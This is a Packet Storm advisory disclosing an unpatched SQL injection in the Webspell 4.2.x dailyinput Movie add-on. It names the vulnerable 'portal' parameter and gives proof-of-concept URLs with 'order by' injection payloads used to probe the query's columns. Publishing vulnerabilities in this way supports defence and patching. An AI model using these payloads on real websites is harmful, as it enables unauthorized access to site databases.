Webspell Dailyinput Movie add-on version 4.2.x suffers from a SQL injection vulnerability.
a5fc795f097402447412a4f8c374d1007cba101f2fdb4bcd55e1b0bdc1902c8f========================================================================================
| # Title : Webspell 4.2.x dailyinput Movie-Addon SQL Injection Vulnerability
| # Author : Easy Laster
| # Script : Webspell 4.2.x dailyinput Movie-Addon
| # Site : www.kode-designs.com
| # Download : www.setgaming.de/index.php?site=files&file=26
| # Demo : www.setgaming.de/index.php?site=videos
| # Price : free
| # Exploitation : Remote SQL Vulnerability
| # Bug : Remote SQL Vulnerability
| # Date : 08.06.2012
| # Language : PHP
| # Status : vulnerable
| # Greetings: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, ezah, Manifest
====================== Proof of Concept =================================
[+] Introduction
dailyinput Movie-Addon is a Addon for the Webspell Web Application the Content Management
System. In this Addon we found a Remote SQL Injection vulnerability.The Movie file
is Vulnerable and a high risk Bug.The Vulnerability is Not fixed from the coder.The most
Webspell Webapplication has a Security System in the Webspell core self.You must bypass
the core from Webspell Security System (globalskiller).
[+] Vulnerability
http://[host]/[path]/index.php?site=videos&action=detail&id=2&portal=[vul]
[+] Exploit
http://[host]/[path]/index.php?site=videos&action=detail&id=2&portal=1+order+by+5--+
http://[host]/[path]/index.php?site=videos&action=detail&id=2&portal=1+order+by+4--+
[+] Fix
No fix.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed